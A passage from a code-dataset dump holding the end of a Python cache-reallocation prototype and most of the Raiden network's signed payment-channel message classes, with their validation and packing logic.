{new_latency}\")\n if server_name not in self.server_map:\n raise Exception(\"Invalid server name provided\")\n \n server = self.server_map[server_name]\n server.add_latency(new_latency)\n self.reallocate_cache()\n self.current_tail_latencies()\n \n def reallocate_cache(self):\n print(f\"reallocate_cache for robinhood cluster\")\n min_latency_server = None\n max_latency_server = None\n \n for server in self.server_list:\n if min_latency_server is None:\n min_latency_server = server\n \n if server.tail_latency < min_latency_server.tail_latency:\n min_latency_server = server\n\n if max_latency_server is None:\n max_latency_server = server\n \n if server.tail_latency > max_latency_server.tail_latency:\n max_latency_server = server\n\n allocate_amount = min_latency_server.cache_hit_percentage/2\n\n max_latency_server.cache_hit_percentage += allocate_amount\n min_latency_server.cache_hit_percentage -= allocate_amount\n self.find_overall_tail_latency()\n self.current_cache_allocation()\n \n def current_cache_allocation(self):\n cache_hit_list = [server.cache_hit_percentage for server in self.server_list]\n print(f\"Current cache_hit_list: {cache_hit_list}\")\n \n def current_tail_latencies(self):\n tail_latencies = [server.tail_latency for server in self.server_list]\n print(f\"Current tail_latencies: {tail_latencies}\")\n\n def find_overall_tail_latency(self):\n latency_list = [server.tail_latency for server in self.server_list]\n self.overall_tail_latency = find_tail_latency(latency_list)\n print(f\"Current overall_tail_latency: {self.overall_tail_latency}\")\n ","repo_name":"SadiaZahin/smart-cache-prototype","sub_path":"src/robinhood.py","file_name":"robinhood.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27337325444","text":"from dataclasses import dataclass, field\nfrom operator import attrgetter\n\nfrom cachetools import LRUCache, cached\nfrom eth_utils import big_endian_to_int\n\nfrom raiden.constants import EMPTY_SIGNATURE, UINT64_MAX, UINT256_MAX\nfrom raiden.encoding import messages\nfrom raiden.encoding.format import buffer_for\nfrom raiden.exceptions import InvalidProtocolMessage, InvalidSignature\nfrom raiden.storage.serialization import DictSerializer\nfrom raiden.transfer import channel\nfrom raiden.transfer.architecture import SendMessageEvent\nfrom raiden.transfer.balance_proof import (\n pack_balance_proof,\n pack_balance_proof_update,\n pack_reward_proof,\n)\nfrom raiden.transfer.events import SendProcessed\nfrom raiden.transfer.identifiers import CanonicalIdentifier\nfrom raiden.transfer.mediated_transfer.events import (\n SendBalanceProof,\n SendLockedTransfer,\n SendLockExpired,\n SendRefundTransfer,\n SendSecretRequest,\n SendSecretReveal,\n)\nfrom raiden.transfer.mediated_transfer.state import LockedTransferSignedState\nfrom raiden.transfer.state import (\n BalanceProofSignedState,\n HashTimeLockState,\n NettingChannelState,\n balanceproof_from_envelope,\n)\nfrom raiden.transfer.utils import hash_balance_data\nfrom raiden.utils import ishash, pex, sha3\nfrom raiden.utils.signer import Signer, recover\nfrom raiden.utils.typing import (\n MYPY_ANNOTATION,\n AdditionalHash,\n Address,\n BalanceHash,\n BlockExpiration,\n ChainID,\n ChannelID,\n ClassVar,\n Dict,\n FeeAmount,\n InitiatorAddress,\n Locksroot,\n MessageID,\n Nonce,\n Optional,\n PaymentAmount,\n PaymentID,\n PaymentWithFeeAmount,\n RaidenProtocolVersion,\n Secret,\n SecretHash,\n Signature,\n TargetAddress,\n TokenAddress,\n TokenAmount,\n TokenNetworkAddress,\n Type,\n)\n\n__all__ = (\n \"Delivered\",\n \"EnvelopeMessage\",\n \"Lock\",\n \"LockedTransfer\",\n \"LockedTransferBase\",\n \"LockExpired\",\n \"Message\",\n \"Ping\",\n \"Pong\",\n \"Processed\",\n \"RefundTransfer\",\n \"RequestMonitoring\",\n \"RevealSecret\",\n \"SecretRequest\",\n \"SignedBlindedBalanceProof\",\n \"SignedMessage\",\n \"ToDevice\",\n \"Unlock\",\n \"UpdatePFS\",\n \"decode\",\n \"from_dict\",\n \"message_from_sendevent\",\n)\n\n\n_senders_cache = LRUCache(maxsize=128)\n_hashes_cache = LRUCache(maxsize=128)\n_lock_bytes_cache = LRUCache(maxsize=128)\n\n\ndef assert_envelope_values(\n nonce: int,\n channel_identifier: ChannelID,\n transferred_amount: TokenAmount,\n locked_amount: TokenAmount,\n locksroot: Locksroot,\n):\n if nonce <= 0:\n raise ValueError(\"nonce cannot be zero or negative\")\n\n if nonce > UINT64_MAX:\n raise ValueError(\"nonce is too large\")\n\n if channel_identifier < 0:\n raise ValueError(\"channel id cannot be negative\")\n\n if channel_identifier > UINT256_MAX:\n raise ValueError(\"channel id is too large\")\n\n if transferred_amount < 0:\n raise ValueError(\"transferred_amount cannot be negative\")\n\n if transferred_amount > UINT256_MAX:\n raise ValueError(\"transferred_amount is too large\")\n\n if locked_amount < 0:\n raise ValueError(\"locked_amount cannot be negative\")\n\n if locked_amount > UINT256_MAX:\n raise ValueError(\"locked_amount is too large\")\n\n if len(locksroot) != 32:\n raise ValueError(\"locksroot must have length 32\")\n\n\ndef assert_transfer_values(payment_identifier, token, recipient):\n if payment_identifier < 0:\n raise ValueError(\"payment_identifier cannot be negative\")\n\n if payment_identifier > UINT64_MAX:\n raise ValueError(\"payment_identifier is too large\")\n\n if len(token) != 20:\n raise ValueError(\"token is an invalid address\")\n\n if len(recipient) != 20:\n raise ValueError(\"recipient is an invalid address\")\n\n\ndef decode(data: bytes) -> \"Message\":\n try:\n klass = CMDID_TO_CLASS[data[0]]\n except KeyError:\n raise InvalidProtocolMessage(\"Invalid message type (CMDID = {})\".format(hex(data[0])))\n return klass.decode(data)\n\n\ndef from_dict(data: dict) -> \"Message\":\n try:\n CLASSNAME_TO_CLASS[data[\"type\"]]\n except KeyError:\n if \"type\" in data:\n raise InvalidProtocolMessage(\n 'Invalid message type (data[\"type\"] = {})'.format(data[\"type\"])\n ) from None\n else:\n raise InvalidProtocolMessage(\n \"Invalid message data. Can not find the data type\"\n ) from None\n return DictSerializer.serialize(data)\n\n\ndef message_from_sendevent(send_event: SendMessageEvent) -> \"Message\":\n if type(send_event) == SendLockedTransfer:\n assert isinstance(send_event, SendLockedTransfer), MYPY_ANNOTATION\n message = LockedTransfer.from_event(send_event)\n elif type(send_event) == SendSecretReveal:\n assert isinstance(send_event, SendSecretReveal), MYPY_ANNOTATION\n message = RevealSecret.from_event(send_event)\n elif type(send_event) == SendBalanceProof:\n assert isinstance(send_event, SendBalanceProof), MYPY_ANNOTATION\n message = Unlock.from_event(send_event)\n elif type(send_event) == SendSecretRequest:\n assert isinstance(send_event, SendSecretRequest), MYPY_ANNOTATION\n message = SecretRequest.from_event(send_event)\n elif type(send_event) == SendRefundTransfer:\n assert isinstance(send_event, SendRefundTransfer), MYPY_ANNOTATION\n message = RefundTransfer.from_event(send_event)\n elif type(send_event) == SendLockExpired:\n assert isinstance(send_event, SendLockExpired), MYPY_ANNOTATION\n message = LockExpired.from_event(send_event)\n elif type(send_event) == SendProcessed:\n assert isinstance(send_event, SendProcessed), MYPY_ANNOTATION\n message = Processed.from_event(send_event)\n else:\n raise ValueError(f\"Unknown event type {send_event}\")\n\n return message\n\n\n@dataclass(repr=False, eq=False)\nclass Message:\n # Needs to be set by a subclass\n cmdid: ClassVar[int]\n\n def __eq__(self, other):\n return isinstance(other, self.__class__) and self.hash == other.hash\n\n def __hash__(self):\n return big_endian_to_int(self.hash)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return \"<{klass} [msghash={msghash}]>\".format(\n klass=self.__class__.__name__, msghash=pex(self.hash)\n )\n\n @property\n def hash(self):\n packed = self.packed()\n return sha3(packed.data)\n\n @classmethod\n def decode(cls, data):\n packed = messages.wrap(data)\n return cls.unpack(packed)\n\n def encode(self) -> bytes:\n packed = self.packed()\n return bytes(packed.data)\n\n def packed(self):\n klass = messages.CMDID_MESSAGE[self.cmdid]\n data = buffer_for(klass)\n data[0] = self.cmdid\n packed = klass(data)\n self.pack(packed)\n\n return packed\n\n @classmethod\n def unpack(cls, packed):\n raise NotImplementedError(\"Method needs to be implemented in a subclass.\")\n\n def pack(self, packed) -> None:\n raise NotImplementedError(\"Method needs to be implemented in a subclass.\")\n\n\n@dataclass(repr=False, eq=False)\nclass AuthenticatedMessage(Message):\n \"\"\" Message, that has a sender. \"\"\"\n\n def sender(self) -> Address:\n raise NotImplementedError(\"Property needs to be implemented in subclass.\")\n\n\n@dataclass(repr=False, eq=False)\nclass SignedMessage(AuthenticatedMessage):\n # signing is a bit problematic, we need to pack the data to sign, but the\n # current API assumes that signing is called before, this can be improved\n # by changing the order to packing then signing\n signature: Signature\n\n def _data_to_sign(self) -> bytes:\n \"\"\" Return the binary data to be/which was signed \"\"\"\n packed = self.packed()\n\n field = type(packed).fields_spec[-1]\n assert field.name == \"signature\", \"signature is not the last field\"\n\n # this slice must be from the end of the buffer\n return packed.data[: -field.size_bytes]\n\n def sign(self, signer: Signer):\n \"\"\" Sign message using signer. \"\"\"\n message_data = self._data_to_sign()\n self.signature = signer.sign(data=message_data)\n\n @property # type: ignore\n @cached(_senders_cache, key=attrgetter(\"signature\"))\n def sender(self) -> Optional[Address]:\n if not self.signature:\n return None\n data_that_was_signed = self._data_to_sign()\n message_signature = self.signature\n\n try:\n address: Optional[Address] = recover(\n data=data_that_was_signed, signature=message_signature\n )\n except InvalidSignature:\n address = None\n return address\n\n @classmethod\n def decode(cls, data):\n packed = messages.wrap(data)\n\n if packed is None:\n return None\n\n return cls.unpack(packed)\n\n\n@dataclass(repr=False, eq=False)\nclass RetrieableMessage:\n \"\"\" Message, that supports a retry-queue. \"\"\"\n\n message_identifier: MessageID\n\n\n@dataclass(repr=False, eq=False)\nclass SignedRetrieableMessage(SignedMessage, RetrieableMessage):\n \"\"\" Mixin of SignedMessage and RetrieableMessage. \"\"\"\n\n pass\n\n\n@dataclass(repr=False, eq=False)\nclass EnvelopeMessage(SignedRetrieableMessage):\n chain_id: ChainID\n nonce: Nonce\n transferred_amount: TokenAmount\n locked_amount: TokenAmount\n locksroot: Locksroot\n channel_identifier: ChannelID\n token_network_address: TokenNetworkAddress\n\n def __post_init__(self):\n assert_envelope_values(\n self.nonce,\n self.channel_identifier,\n self.transferred_amount,\n self.locked_amount,\n self.locksroot,\n )\n\n @property\n def message_hash(self):\n packed = self.packed()\n klass = type(packed)\n\n field = klass.fields_spec[-1]\n assert field.name == \"signature\", \"signature is not the last field\"\n\n data = packed.data\n message_data = data[: -field.size_bytes]\n message_hash = sha3(message_data)\n\n return message_hash\n\n def _data_to_sign(self) -> bytes:\n balance_hash = hash_balance_data(\n self.transferred_amount, self.locked_amount, self.locksroot\n )\n balance_proof_packed = pack_balance_proof(\n nonce=self.nonce,\n balance_hash=balance_hash,\n additional_hash=self.message_hash,\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.chain_id,\n token_network_address=self.token_network_address,\n channel_identifier=self.channel_identifier,\n ),\n )\n return balance_proof_packed\n\n\n@dataclass(repr=False, eq=False)\nclass Processed(SignedRetrieableMessage):\n \"\"\" All accepted messages should be confirmed by a `Processed` message which echoes the\n orginals Message hash.\n \"\"\"\n\n # FIXME: Processed should _not_ be SignedRetrieableMessage, but only SignedMessage\n cmdid: ClassVar[int] = messages.PROCESSED\n\n message_identifier: MessageID\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n processed = cls(message_identifier=packed.message_identifier, signature=packed.signature)\n return processed\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n return cls(message_identifier=event.message_identifier, signature=EMPTY_SIGNATURE)\n\n\n@dataclass(repr=False, eq=False)\nclass ToDevice(SignedMessage):\n \"\"\"\n Message, which can be directly sent to all devices of a node known by matrix,\n no room required. Messages which are supposed to be sent via transport.sent_to_device must\n subclass.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.TODEVICE\n\n message_identifier: MessageID\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n to_device = cls(message_identifier=packed.message_identifier, signature=packed.signature)\n return to_device\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass Delivered(SignedMessage):\n \"\"\" Message used to inform the partner node that a message was received *and*\n persisted.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.DELIVERED\n\n delivered_message_identifier: MessageID\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n delivered = cls(\n delivered_message_identifier=packed.delivered_message_identifier,\n signature=packed.signature,\n )\n return delivered\n\n def pack(self, packed) -> None:\n packed.delivered_message_identifier = self.delivered_message_identifier\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass Pong(SignedMessage):\n \"\"\" Response to a Ping message. \"\"\"\n\n cmdid: ClassVar[int] = messages.PONG\n\n nonce: Nonce\n\n @staticmethod\n def unpack(packed):\n pong = Pong(nonce=packed.nonce, signature=packed.signature)\n return pong\n\n def pack(self, packed) -> None:\n packed.nonce = self.nonce\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass Ping(SignedMessage):\n \"\"\" Healthcheck message. \"\"\"\n\n cmdid: ClassVar[int] = messages.PING\n\n nonce: Nonce\n current_protocol_version: RaidenProtocolVersion\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n ping = cls(\n nonce=packed.nonce,\n current_protocol_version=packed.current_protocol_version,\n signature=packed.signature,\n )\n return ping\n\n def pack(self, packed) -> None:\n packed.nonce = self.nonce\n packed.current_protocol_version = self.current_protocol_version\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass SecretRequest(SignedRetrieableMessage):\n \"\"\" Requests the secret which unlocks a secrethash. \"\"\"\n\n cmdid: ClassVar[int] = messages.SECRETREQUEST\n\n payment_identifier: PaymentID\n secrethash: SecretHash\n amount: PaymentAmount\n expiration: BlockExpiration\n\n @classmethod\n def unpack(cls, packed):\n secret_request = cls(\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n secrethash=packed.secrethash,\n amount=packed.amount,\n expiration=packed.expiration,\n signature=packed.signature,\n )\n return secret_request\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.secrethash = self.secrethash\n packed.amount = self.amount\n packed.expiration = self.expiration\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n # pylint: disable=unexpected-keyword-arg\n return cls(\n message_identifier=event.message_identifier,\n payment_identifier=event.payment_identifier,\n secrethash=event.secrethash,\n amount=event.amount,\n expiration=event.expiration,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass Unlock(EnvelopeMessage):\n \"\"\" Message used to do state changes on a partner Raiden Channel.\n\n Locksroot changes need to be synchronized among both participants, the\n protocol is for only the side unlocking to send the Unlock message allowing\n the other party to claim the unlocked lock.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.UNLOCK\n\n payment_identifier: PaymentID\n secret: Secret = field(repr=False)\n\n def __post_init__(self):\n super().__post_init__()\n if self.payment_identifier < 0:\n raise ValueError(\"payment_identifier cannot be negative\")\n\n if self.payment_identifier > UINT64_MAX:\n raise ValueError(\"payment_identifier is too large\")\n\n if len(self.secret) != 32:\n raise ValueError(\"secret must have 32 bytes\")\n\n @property # type: ignore\n @cached(_hashes_cache, key=attrgetter(\"secret\"))\n def secrethash(self):\n return sha3(self.secret)\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n secret = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n locked_amount=packed.locked_amount,\n locksroot=packed.locksroot,\n secret=packed.secret,\n signature=packed.signature,\n )\n return secret\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.nonce = self.nonce\n packed.token_network_address = self.token_network_address\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.locksroot = self.locksroot\n packed.secret = self.secret\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n balance_proof = event.balance_proof\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n message_identifier=event.message_identifier,\n payment_identifier=event.payment_identifier,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n locked_amount=balance_proof.locked_amount,\n locksroot=balance_proof.locksroot,\n secret=event.secret,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass RevealSecret(SignedRetrieableMessage):\n \"\"\"Message used to reveal a secret to party known to have interest in it.\n\n This message is not sufficient for state changes in the raiden Channel, the\n reason is that a node participating in split transfer or in both mediated\n transfer for an exchange might can reveal the secret to it's partners, but\n that must not update the internal channel state.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.REVEALSECRET\n\n secret: Secret = field(repr=False)\n\n @property # type: ignore\n @cached(_hashes_cache, key=attrgetter(\"secret\"))\n def secrethash(self):\n return sha3(self.secret)\n\n @classmethod\n def unpack(cls, packed):\n reveal_secret = RevealSecret(\n message_identifier=packed.message_identifier,\n secret=packed.secret,\n signature=packed.signature,\n )\n return reveal_secret\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.secret = self.secret\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n # pylint: disable=unexpected-keyword-arg\n return cls(\n message_identifier=event.message_identifier,\n secret=event.secret,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass Lock:\n \"\"\" Describes a locked `amount`.\n\n Args:\n amount: Amount of the token being transferred.\n expiration: Highest block_number until which the transfer can be settled\n secrethash: Hashed secret `sha3(secret)` used to register the transfer,\n the real `secret` is necessary to release the locked amount.\n \"\"\"\n\n # Lock is not a message, it is a serializable structure that is reused in\n # some messages\n amount: PaymentWithFeeAmount\n expiration: BlockExpiration\n secrethash: SecretHash\n\n def __post_init__(self):\n # guarantee that `amount` can be serialized using the available bytes\n # in the fixed length format\n if self.amount < 0:\n raise ValueError(f\"amount {self.amount} needs to be positive\")\n\n if self.amount > UINT256_MAX:\n raise ValueError(f\"amount {self.amount} is too large\")\n\n if self.expiration < 0:\n raise ValueError(f\"expiration {self.expiration} needs to be positive\")\n\n if self.expiration > UINT256_MAX:\n raise ValueError(f\"expiration {self.expiration} is too large\")\n\n if not ishash(self.secrethash):\n raise ValueError(\"secrethash {self.secrethash} is not a valid hash\")\n\n @property # type: ignore\n @cached(_lock_bytes_cache, key=attrgetter(\"amount\", \"expiration\", \"secrethash\"))\n def as_bytes(self):\n packed = messages.Lock(buffer_for(messages.Lock))\n packed.amount = self.amount\n packed.expiration = self.expiration\n packed.secrethash = self.secrethash\n\n # convert bytearray to bytes\n return bytes(packed.data)\n\n @property # type: ignore\n @cached(_hashes_cache, key=attrgetter(\"as_bytes\"))\n def lockhash(self):\n return sha3(self.as_bytes)\n\n @classmethod\n def from_bytes(cls, serialized):\n packed = messages.Lock(serialized)\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n\n@dataclass(repr=False, eq=False)\nclass LockedTransferBase(EnvelopeMessage):\n \"\"\" A transfer which signs that the partner can claim `locked_amount` if\n she knows the secret to `secrethash`.\n\n The token amount is implicitly represented in the `locksroot` and won't be\n reflected in the `transferred_amount` until the secret is revealed.\n\n This signs Carol, that she can claim locked_amount from Bob if she knows\n the secret to secrethash.\n\n If the secret to secrethash becomes public, but Bob fails to sign Carol a\n netted balance, with an updated rootlock which reflects the deletion of the\n lock, then Carol can request settlement on chain by providing: any signed\n [nonce, token, balance, recipient, locksroot, ...] along a merkle proof\n from locksroot to the not yet netted formerly locked amount.\n \"\"\"\n\n payment_identifier: PaymentID\n token: TokenAddress\n recipient: Address\n lock: Lock\n\n def __post_init__(self):\n super().__post_init__()\n assert_transfer_values(self.payment_identifier, self.token, self.recipient)\n\n @classmethod\n def unpack(cls, packed):\n lock = Lock(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n # pylint: disable=unexpected-keyword-arg\n locked_transfer = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n token=packed.token,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n recipient=packed.recipient,\n locked_amount=packed.locked_amount,\n locksroot=packed.locksroot,\n lock=lock,\n signature=packed.signature,\n )\n return locked_transfer\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.nonce = self.nonce\n packed.token_network_address = self.token_network_address\n packed.token = self.token\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.recipient = self.recipient\n packed.locksroot = self.locksroot\n\n lock = self.lock\n packed.amount = lock.amount\n packed.expiration = lock.expiration\n packed.secrethash = lock.secrethash\n\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass LockedTransfer(LockedTransferBase):\n \"\"\"\n A LockedTransfer has a `target` address to which a chain of transfers shall\n be established. Here the `secrethash` is mandatory.\n\n `fee` is the remaining fee a recipient shall use to complete the mediated transfer.\n The recipient can deduct his own fee from the amount and lower `fee` to the remaining fee.\n Just as the recipient can fail to forward at all, or the assumed amount,\n it can deduct a too high fee, but this would render completion of the transfer unlikely.\n\n The initiator of a mediated transfer will calculate fees based on the likely fees along the\n path. Note, it can not determine the path, as it does not know which nodes are available.\n\n Initial `amount` should be expected received amount + fees.\n\n Fees are always payable by the initiator.\n\n `initiator` is the party that knows the secret to the `secrethash`\n \"\"\"\n\n cmdid: ClassVar[int] = messages.LOCKEDTRANSFER\n\n target: TargetAddress\n initiator: InitiatorAddress\n fee: int\n\n def __post_init__(self):\n super().__post_init__()\n\n if len(self.target) != 20:\n raise ValueError(\"target is an invalid address\")\n\n if len(self.initiator) != 20:\n raise ValueError(\"initiator is an invalid address\")\n\n if self.fee > UINT256_MAX:\n raise ValueError(\"fee is too large\")\n\n @classmethod\n def unpack(cls, packed):\n lock = Lock(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n # pylint: disable=unexpected-keyword-arg\n mediated_transfer = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n token=packed.token,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n locked_amount=packed.locked_amount,\n recipient=packed.recipient,\n locksroot=packed.locksroot,\n lock=lock,\n target=packed.target,\n initiator=packed.initiator,\n fee=packed.fee,\n signature=packed.signature,\n )\n return mediated_transfer\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.nonce = self.nonce\n packed.token_network_address = self.token_network_address\n packed.token = self.token\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.recipient = self.recipient\n packed.locksroot = self.locksroot\n packed.target = self.target\n packed.initiator = self.initiator\n packed.fee = self.fee\n\n lock = self.lock\n packed.amount = lock.amount\n packed.expiration = lock.expiration\n packed.secrethash = lock.secrethash\n\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event: SendLockedTransfer) -> \"LockedTransfer\":\n transfer = event.transfer\n balance_proof = transfer.balance_proof\n lock = Lock(\n amount=transfer.lock.amount,\n expiration=transfer.lock.expiration,\n secrethash=transfer.lock.secrethash,\n )\n fee = 0\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n message_identifier=event.message_identifier,\n payment_identifier=transfer.payment_identifier,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n token=transfer.token,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n locked_amount=balance_proof.locked_amount,\n recipient=event.recipient,\n locksroot=balance_proof.locksroot,\n lock=lock,\n target=transfer.target,\n initiator=transfer.initiator,\n fee=fee,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass RefundTransfer(LockedTransfer):\n \"\"\" A special LockedTransfer sent from a payee to a payer indicating that\n no route is available, this transfer will effectively refund the payer the\n transfer amount allowing him to try a new path to complete the transfer.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.REFUNDTRANSFER\n\n @classmethod\n def unpack(cls, packed):\n lock = Lock(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n # pylint: disable=unexpected-keyword-arg\n locked_transfer = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n token=packed.token,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n locked_amount=packed.locked_amount,\n recipient=packed.recipient,\n locksroot=packed.locksroot,\n lock=lock,\n target=packed.target,\n initiator=packed.initiator,\n fee=packed.fee,\n signature=packed.signature,\n )\n return locked_transfer\n\n @classmethod\n def from_event(cls, event):\n transfer = event.transfer\n balance_proof = transfer.balance_proof\n lock = Lock(\n amount=transfer.lock.amount,\n expiration=transfer.lock.expiration,\n secrethash=transfer.lock.secrethash,\n )\n fee = 0\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n message_identifier=event.message_identifier,\n payment_identifier=transfer.payment_identifier,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n token=transfer.token,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n locked_amount=balance_proof.locked_amount,\n recipient=event.recipient,\n locksroot=balance_proof.locksroot,\n lock=lock,\n target=transfer.target,\n initiator=transfer.initiator,\n fee=fee,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass LockExpired(EnvelopeMessage):\n \"\"\"Message used to notify opposite channel participant that a lock has\n expired.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.LOCKEXPIRED\n\n recipient: Address\n secrethash: SecretHash\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n transfer = cls(\n chain_id=packed.chain_id,\n nonce=packed.nonce,\n message_identifier=packed.message_identifier,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n recipient=packed.recipient,\n locked_amount=packed.locked_amount,\n locksroot=packed.locksroot,\n secrethash=packed.secrethash,\n signature=packed.signature,\n )\n\n return transfer\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.nonce = self.nonce\n packed.message_identifier = self.message_identifier\n packed.token_network_address = self.token_network_address\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.recipient = self.recipient\n packed.locksroot = self.locksroot\n packed.secrethash = self.secrethash\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n balance_proof = event.balance_proof\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n locked_amount=balance_proof.locked_amount,\n locksroot=balance_proof.locksroot,\n message_identifier=event.message_identifier,\n recipient=event.recipient,\n secrethash=event.secrethash,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass SignedBlindedBalanceProof:\n \"\"\"Message sub-field `onchain_balance_proof` for `RequestMonitoring`.\n \"\"\"\n\n channel_identifier: ChannelID\n token_network_address: TokenNetworkAddress\n nonce: Nonce\n additional_hash: AdditionalHash\n chain_id: ChainID\n balance_hash: BalanceHash\n signature: Signature\n non_closing_signature: Optional[Signature] = field(default=EMPTY_SIGNATURE)\n\n def __post_init__(self):\n if self.signature == EMPTY_SIGNATURE:\n raise ValueError(\"balance proof is not signed\")\n\n @classmethod\n def from_balance_proof_signed_state(\n cls, balance_proof: BalanceProofSignedState\n ) -> \"SignedBlindedBalanceProof\":\n if not isinstance(balance_proof, BalanceProofSignedState):\n raise ValueError(\n \"balance_proof is not an instance of the type BalanceProofSignedState\"\n )\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n channel_identifier=balance_proof.channel_identifier,\n token_network_address=balance_proof.token_network_address,\n nonce=balance_proof.nonce,\n additional_hash=balance_proof.message_hash,\n chain_id=balance_proof.chain_id,\n signature=balance_proof.signature,\n balance_hash=hash_balance_data(\n balance_proof.transferred_amount,\n balance_proof.locked_amount,\n balance_proof.locksroot,\n ),\n )\n\n def _data_to_sign(self) -> bytes:\n packed = pack_balance_proof_update(\n nonce=self.nonce,\n balance_hash=self.balance_hash,\n additional_hash=self.additional_hash,\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.chain_id,\n token_network_address=self.token_network_address,\n channel_identifier=self.channel_identifier,\n ),\n partner_signature=self.signature,\n )\n return packed\n\n def _sign(self, signer: Signer) -> Signature:\n \"\"\"Internal function for the overall `sign` function of 